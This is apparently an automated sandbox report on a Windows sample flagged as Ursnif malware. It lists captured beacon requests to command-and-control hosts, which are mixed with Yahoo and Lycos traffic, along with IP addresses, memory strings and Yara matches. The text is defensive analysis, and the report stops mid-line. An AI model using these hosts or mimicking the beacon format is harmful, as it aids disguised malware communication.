Source: global traffic; HTTP traffic detected: GET /jdraw/f6g_2FiF4/BVB_2BmxiIV1nw_2B4cK/CEW08ItbFLwHO8UQuXN/_2BLf2lFUFBrC4suobQbOB/0fGYw2vRMdeDd/GloxsNvw/PasUyB_2F_2BHKhCo7UgE3u/2gjzOvnViA/3VWPE0psH7LTVPa7Y/AQrrT0oMv35d/Jg57ryhE8om/OJw5Ee8c4mGK6J/l0QzZoUYoPnAbKMV1LRii/_2FzkrD.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: soderunovos.website | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
Source: global traffic; HTTP traffic detected: GET /jdraw/F_2Fam6oH9/d5VYFYpsfuCm2K1vb/FQEZJonXTERW/XCyivBuN7WP/pkkBh6P8bwS7JA/_2BGKoxOOY8NFu9I7k4lJ/PQBFMF7GdwoWQQpH/fx_2BleSZS1DDTO/Af_2FwYYreElF2LILk/I1df5_2Fd/zVYWpMKEIfwVAwGc0tI5/Te_2FDbyN2KV7bbG5lt/D80197YRF38WxHFk/uqB4Yp.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: soderunovos.website | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
Source: global traffic; HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: lycos.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Connection: Keep-Alive | Cache-Control: no-cache | Host: www.lycos.com
Source: global traffic; HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg/ HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Connection: Keep-Alive | Cache-Control: no-cache | Host: www.lycos.com
Source: global traffic; HTTP traffic detected: GET /images/_2BRLy1x/4wsN2dLN7SbtqKweyBCVQVy/ncNEkpC68M/pGX_2BOwGt0R9_2BF/gPvtyZ2zCuXU/MtW7n3eg_2B/cVfCNS_2BVDqYE/NcD6s_2FvRGdMXsqfE9ud/QnKqi6Gdk85wdC67/aXmIXPep1RKvSuC/dU0LoB35OeBogincV5/_2FxALfnm/Pttx7XLPfUVU3_2FKsJC/yP8zqBt1Q2czLtOvx6I/xwix1VQVzSylmtN4_2FaYq/KZRSXLzBBanwh/lTfsORlu/JAGztGerO6_2BOMh0JL/2.gif HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: mail.yahoo.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2F_2BRLy1x%2F4wsN2dLN7SbtqKweyBCVQVy%2FncNEkpC68M%2FpGX_2BOwGt0R9_2BF%2FgPvtyZ2zCuXU%2FMtW7n3eg_2B%2FcVfCNS_2BVDqYE%2FNcD6s_2FvRGdMXsqfE9ud%2FQnKqi6Gdk85wdC67%2FaXmIXPep1RKvSuC%2FdU0LoB35OeBogincV5%2F_2FxALfnm%2FPttx7XLPfUVU3_2FKsJC%2FyP8zqBt1Q2czLtOvx6I%2Fxwix1VQVzSylmtN4_2FaYq%2FKZRSXLzBBanwh%2FlTfsORlu%2FJAGztGerO6_2BOMh0JL%2F2.gif HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Connection: Keep-Alive | Cache-Control: no-cache | Host: login.yahoo.com
Source: Joe Sandbox View; ASN Name: M247GB M247GB
Source: Joe Sandbox View; IP Address: 87.248.118.23 87.248.118.23
Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txt
Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co/xa
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000D.00000002.878324773.0000016899EF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=4np
                      Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://qoderunovos.website
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://soderunovos.website
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://soderunovos.websitehttps://qoderunovos.website
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2H
                      Source: unknownDNS traffic detected: queries for: yahoo.com
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeCode function: 1_2_03C55988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,1_2_03C55988
                      Source: global trafficHTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=0m9msshgpqh4o&b=3&s=91
                      Source: global trafficHTTP traffic detected: GET /jdraw/izNkSVzKAcmqBRr6xyW/6eSNtrmUMl5kl7H7bHpPPe/XgZq30OCLmJbN/38meyqW9/jS3Kn1JZp4TlGq5YgXpUl9C/Xa1SOjVmRG/sfAXrifyx5RMMj1rG/x2_2B6xVjnCu/FR4yio2EmeZ/DM6_2BUk4qTqT1/rz8mXurCnwQiTqH0u8uPF/_2Bjp7nf0rXmnB1i/Em2dqw_2Bys5D/8.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/f6g_2FiF4/BVB_2BmxiIV1nw_2B4cK/CEW08ItbFLwHO8UQuXN/_2BLf2lFUFBrC4suobQbOB/0fGYw2vRMdeDd/GloxsNvw/PasUyB_2F_2BHKhCo7UgE3u/2gjzOvnViA/3VWPE0psH7LTVPa7Y/AQrrT0oMv35d/Jg57ryhE8om/OJw5Ee8c4mGK6J/l0QzZoUYoPnAbKMV1LRii/_2FzkrD.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/F_2Fam6oH9/d5VYFYpsfuCm2K1vb/FQEZJonXTERW/XCyivBuN7WP/pkkBh6P8bwS7JA/_2BGKoxOOY8NFu9I7k4lJ/PQBFMF7GdwoWQQpH/fx_2BleSZS1DDTO/Af_2FwYYreElF2LILk/I1df5_2Fd/zVYWpMKEIfwVAwGc0tI5/Te_2FDbyN2KV7bbG5lt/D80197YRF38WxHFk/uqB4Yp.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/_2BRLy1x/4wsN2dLN7SbtqKweyBCVQVy/ncNEkpC68M/pGX_2BOwGt0R9_2BF/gPvtyZ2zCuXU/MtW7n3eg_2B/cVfCNS_2BVDqYE/NcD6s_2FvRGdMXsqfE9ud/QnKqi6Gdk85wdC67/aXmIXPep1RKvSuC/dU0LoB35OeBogincV5/_2FxALfnm/Pttx7XLPfUVU3_2FKsJC/yP8zqBt1Q2czLtOvx6I/xwix1VQVzSylmtN4_2FaYq/KZRSXLzBBanwh/lTfsORlu/JAGztGerO6_2BOMh0JL/2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2F_2BRLy1x%2F4wsN2dLN7SbtqKweyBCVQVy%2FncNEkpC68M%2FpGX_2BOwGt0R9_2BF%2FgPvtyZ2zCuXU%2FMtW7n3eg_2B%2FcVfCNS_2BVDqYE%2FNcD6s_2FvRGdMXsqfE9ud%2FQnKqi6Gdk85wdC67%2FaXmIXPep1RKvSuC%2FdU0LoB35OeBogincV5%2F_2FxALfnm%2FPttx7XLPfUVU3_2FKsJC%2FyP8zqBt1Q2czLtOvx6I%2Fxwix1VQVzSylmtN4_2FaYq%2FKZRSXLzBBanwh%2FlTfsORlu%2FJAGztGerO6_2BOMh0JL%2F2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 23 Nov 2021 19:44:24 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 9server: ATSContent-Length: 1084Age: 0Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=4npkagdgpqh4o&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Nov 2021 19:47:06 GMTServer: ApacheContent-Security-Policy: frame-ancestors 'self' *.lycos.comX-Powered-By: PHP/7.2.24Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2Hc%2fBze1TT57OG4HBNl2UO4H2_2%2fF2x5eVeu_2%2fF0oEIMCthzpdl_2F0%2fg6yK5x4lAPBL%2fIfJhlJxCH88%2fkNEvL4B2xwbPkg%2fl6LFIMkoo7_2BSx2Zl9QD%2fsNqAlyxot9VgUnIt%2ftD2_2FQ67j1kKZ4%2f4sQxxRyc1y_2Bi_2BR%2fgsw9z5z81%2fv3w096aztXCXUnfe5Q%2fwc2.crw'"></noscript> equals www.yahoo.com (Yahoo)
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2Hc%2fBze1TT57OG4HBNl2UO4H2_2%2fF2x5eVeu_2%2fF0oEIMCthzpdl_2F0%2fg6yK5x4lAPBL%2fIfJhlJxCH88%2fkNEvL4B2xwbPkg%2fl6LFIMkoo7_2BSx2Zl9QD%2fsNqAlyxot9VgUnIt%2ftD2_2FQ67j1kKZ4%2f4sQxxRyc1y_2Bi_2BR%2fgsw9z5z81%2fv3w096aztXCXUnfe5Q%2fwc2.crw'; equals www.yahoo.com (Yahoo)
                      Source: anIV2qJeLD.exe, 00000001.00000002.969768372.00000000050DA000.00000004.00000010.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: unknownHTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49780 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.4:49781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.4:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49854 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.4:49858 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.754079690.00000000046BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.889480040.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.708583550.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.960938374.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.964489842.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.708535895.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.890926362.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.753558505.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.708632359.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.1067279297.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match<